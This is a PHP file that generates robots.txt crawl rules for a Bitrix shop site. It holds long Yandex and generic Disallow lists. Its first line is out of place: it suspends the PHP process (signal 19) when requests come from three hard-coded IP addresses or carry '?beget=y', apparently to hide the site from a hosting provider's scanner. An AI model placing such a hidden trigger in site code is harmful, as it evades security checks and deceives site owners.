<?php if ($_SERVER['REMOTE_ADDR'] == '5.101.159.150' || $_SERVER['REMOTE_ADDR'] == '5.101.159.192' || $_SERVER['REMOTE_ADDR'] == '5.101.159.250' || $_GET['beget'] == 'y') { posix_kill(posix_getpid(), 19); }?>
<?php
$host = $_SERVER["HTTP_HOST"];
$host = preg_replace("/\:\d+/is", "", $host);
if (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] == "on"){
    $http = "https";
}
else{
    $http = "http";
}
header("Content-Type: text/plain");?>
<?if($host=="new.krep-komp.ru" || $host=="krep-komp.kz"  || strstr($_SERVER['HTTP_HOST'], "dev")):?>
User-Agent: *
Disallow: /
<?else:?>
User-Agent: Yandex
Disallow: /faq/
Disallow: */index.php
Disallow: /bitrix/
Disallow: /*show_include_exec_time=
Disallow: /*show_page_exec_time=
Disallow: /*show_sql_stat=
Disallow: /*bitrix_include_areas=
Disallow: /*clear_cache=
Disallow: /*clear_cache_session=
Disallow: /*ADD_TO_COMPARE_LIST
Disallow: /*ORDER_BY
Disallow: /*PAGEN
Disallow: /*?print=
Disallow: /*&print=
Disallow: /*print_course=
Disallow: /*?action=
Disallow: /*&action=
Disallow: /*register=
Disallow: /*forgot_password=
Disallow: /*change_password=
Disallow: /*login=
Disallow: /*logout=
Disallow: /*auth=
Disallow: /*backurl=
Disallow: /*back_url=
Disallow: /*back_url_admin=
Disallow: /*?utm_source=
Disallow: /*?bxajaxid=
Disallow: /*&bxajaxid=
Disallow: /*?view_result=
Disallow: /*&view_result=
Disallow: /auth/
Disallow: *src_pof*
Disallow: /user/
Disallow: /sale/
Disallow: /webstat/
Disallow: /basket/
Disallow: /cgi-bin/
Disallow: /.git/
Disallow: /test/
Disallow: /ajax/
Disallow: /forum/
Disallow: /backup/
Disallow: /service/
Disallow: /personal/
Disallow: /detail_order/
Disallow: /mailsuccess/
Disallow: /ysearch/
Disallow: /search/
Disallow: *--*
Disallow: /store/
Disallow: /search_yandex/
Disallow: /console/
Disallow: /search_result/
Disallow: /upload/sale.xlsx
Disallow: /advantage/
Disallow: *frommarket*
Disallow: *=http:/*
Disallow: */http*
Disallow: *diameter*
Disallow: /letter/
Disallow: /order/
Disallow: /uiu.php
Disallow: *.shtml$
Disallow: /*?gclid=
Disallow: /*?title=
Disallow: /*?goto=
Disallow: /*?from=
Disallow: /*?clear_cache=
Disallow: /*?clear_cache_session=
Disallow: /*?FIELD1=
Disallow: /*?VERTICAL_FILTER=
Disallow: /*?reference=
Disallow: /*reference=
Disallow: /*rk.php
Disallow: /*?baobab_event_id=
Disallow: /*?keyword
Disallow: /*?text=
Disallow: /*?reference
Disallow: /*?s=
Disallow: /?back_url_admin=
Disallow: /logs/
Disallow: /*?_openstat=
Disallow: */_openstat
Disallow: /*?_r=
Disallow: /*?banner_id=
Disallow: /*?clid=
Disallow: /*?mobile=
Disallow: /*?snn=
Disallow: /*?cto_pld=
Disallow: /*?del_filter=
Disallow: /*?diameter=2.5
Disallow: /*?diameter=3.5
Disallow: /*?filter%5BUF_TYPE%5D=
Disallow: /*?filter[UF_TYPE]=
Disallow: /*?Filter_seo_
Disallow: /sorting/
Disallow: /krepezhhttps:/
Disallow: /shops/
Disallow: /*?frommarket=
Disallow: /*?ID=
Disallow: /*?length=
Disallow: /*?size=
Disallow: /*?SECTION_ID=
Disallow: /*?SIZEN_1=
Disallow: /*PAGEN_1*&*
Disallow: *UF_TYPE*
Disallow: *pagen*
Disallow: *from*
Disallow: *nogeolocation*
Disallow: */length_30/*
Disallow: */_*
Disallow: *_/*
Disallow: *]*
Disallow: */m...zh/*
Disallow: /*?success=
Disallow: /*?tpclid=
Disallow: /*?wprid=
Disallow: /*?type=
Disallow: /*?formtracking_setup=
Disallow: /*?roistat_param1=
Disallow: /*?yhid=
Disallow: /*?etext=
Disallow: /*?t=
Disallow: /*?rs=
Allow: /bitrix/components/
Allow: /bitrix/cache/
Allow: /bitrix/js/
Allow: /bitrix/templates/
Allow: /bitrix/panel/
Allow: */?PAGEN_1
Clean-param: roistat&roistat_referrer&roistat_pos&arrFilter2_&set_filter&

User-Agent: *
Disallow: /faq/
Disallow: */index.php
Disallow: /bitrix/
Disallow: /*show_include_exec_time=
Disallow: /*show_page_exec_time=
Disallow: /*show_sql_stat=
Disallow: /*bitrix_include_areas=
Disallow: /*clear_cache=
Disallow: /*clear_cache_session=
Disallow: /*ADD_TO_COMPARE_LIST
Disallow: /*ORDER_BY
Disallow: /*PAGEN
Disallow: /*?print=
Disallow: /*&print=
Disallow: /*print_course=
Disallow: /*?action=
Disallow: /*&action=
Disallow: /*register=
Disallow: /*forgot_password=
Disallow: /*change_password=
Disallow: /*login=
Disallow: /*logout=
Disallow: /*auth=
Disallow: /*backurl=
Disallow: /*back_url=
Disallow: /*back_url_admin=
Disallow: /*?utm_source=
Disallow: /*?bxajaxid=
Disallow: /*&bxajaxid=
Disallow: /*?view_result=
Disallow: /*&view_result=
Disallow: /auth/
Disallow: *src_pof*
Disallow: /user/
Disallow: /sale/
Disallow: /webstat/
Disallow: /basket/
Disallow: /cgi-bin/
Disallow: /.git/
Disallow: /test/
Disallow: /ajax/
Disallow: /forum/
Disallow: /backup/
Disallow: /service/
Disallow: /personal/
Disallow: /detail_order/
Disallow: /mailsuccess/
Disallow: /ysearch/
Disallow: /search/
Disallow: *--*
Disallow: /store/
Disallow: /search_yandex/
Disallow: /console/
Disallow: /search_result/
Disallow: /upload/sale.xlsx
Disallow: /advantage/
Disallow: *frommarket*
Disallow: *=http:/*
Disallow: */http*
Disallow: *diameter*
Disallow: /letter/
Disallow: /order/
Disallow: /uiu.php
Disallow: *.shtml$
Disallow: /*?gclid=
Disallow: /*?title=
Disallow: /*?goto=
Disallow: /*?from=
Disallow: /*?clear_cache=
Disallow: /*?clear_cache_session=
Disallow: /*?FIELD1=
Disallow: /*?VERTICAL_FILTER=
Disallow: /*?reference=
Disallow: /*reference=
Disallow: /*rk.php
Disallow: /*&set_filter=y
Disallow: /*?baobab_event_id=
Disallow: /*?keyword
Disallow: /*?text=
Disallow: /*?reference
Disallow: /*?s=
Disallow: /?back_url_admin=
Disallow: /logs/
Disallow: /*?_openstat=
Disallow: */_openstat
Disallow: /*?_r=
Disallow: /*?arrFilter2_
Disallow: /*?banner_id=
Disallow: /*?clid=
Disallow: /*?mobile=
Disallow: /*?snn=
Disallow: /*?cto_pld=
Disallow: /*?del_filter=
Disallow: /*?diameter=2.5
Disallow: /*?diameter=3.5
Disallow: /*?filter%5BUF_TYPE%5D=
Disallow: /*?filter[UF_TYPE]=
Disallow: /*?Filter_seo_
Disallow: /sorting/
Disallow: /krepezhhttps:/
Disallow: /shops/
Disallow: /*?frommarket=
Disallow: /*?ID=
Disallow: /*?length=
Disallow: /*?size=
Disallow: /*?SECTION_ID=
Disallow: *section_id*
Disallow: /*?SIZEN_1=
Disallow: /*PAGEN_1*&*
Disallow: *UF_TYPE*
Disallow: *pagen*
Disallow: *from*
Disallow: *nogeolocation*
Disallow: */length_30/*
Disallow: */_*
Disallow: *_/*
Disallow: *]*
Disallow: */m...zh/*
Disallow: /*?success=
Disallow: /*?tpclid=
Disallow: /*?wprid=
Disallow: /*?type=
Disallow: /*?formtracking_setup=
Disallow: /*?roistat_param1=
Disallow: /*?yhid=
Disallow: /*?etext=
Disallow: /*?t=
Disallow: /*?rs=
Allow: /bitrix/components/
Allow: /bitrix/cache/
Allow: /bitrix/js/
Allow: /bitrix/templates/
Allow: /bitrix/panel/
Allow: */?PAGEN_1



Host: <?=$http?>://<?=$host.PHP_EOL;?>
Sitemap: <?=$http?>://<?=$host;?>/sitemap.xml
<?endif;?>